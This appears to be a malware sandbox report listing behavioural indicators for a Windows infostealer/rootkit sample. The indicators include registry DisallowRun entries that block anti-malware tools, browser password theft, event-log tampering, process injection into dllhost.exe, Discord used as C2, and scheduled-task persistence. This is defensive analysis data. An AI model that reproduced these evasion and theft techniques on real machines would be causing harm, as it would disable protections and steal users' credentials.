PID 2728 created 612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 1252 created 612 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocks application from running via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "rkill32.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "mbar.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MRT.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "rkill64.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "mbam.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "rkill.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "MBSetup.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\$77main1.exe N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion
Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A api64.ipify.org N/A N/A
N/A api64.ipify.org N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\Recovery\ReAgent.xml C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\Recovery C:\Windows\system32\ReAgentc.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2728 set thread context of 3480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1252 set thread context of 4764 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\SysWOW64\dllhost.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\system32\ReAgentc.exe N/A
File created C:\Windows\Tasks\$77svc32.job C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
File opened for modification C:\Windows\Tasks\$77svc32.job C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
File created C:\Windows\Tasks\$77svc64.job C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
File opened for modification C:\Windows\Tasks\$77svc64.job C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\system32\ReAgentc.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\$77Redownloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\winhlp32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\xwizard.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\$77main1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\splwow64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\hh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\mousocoreworker.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 07 Oct 2024 10:40:09 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
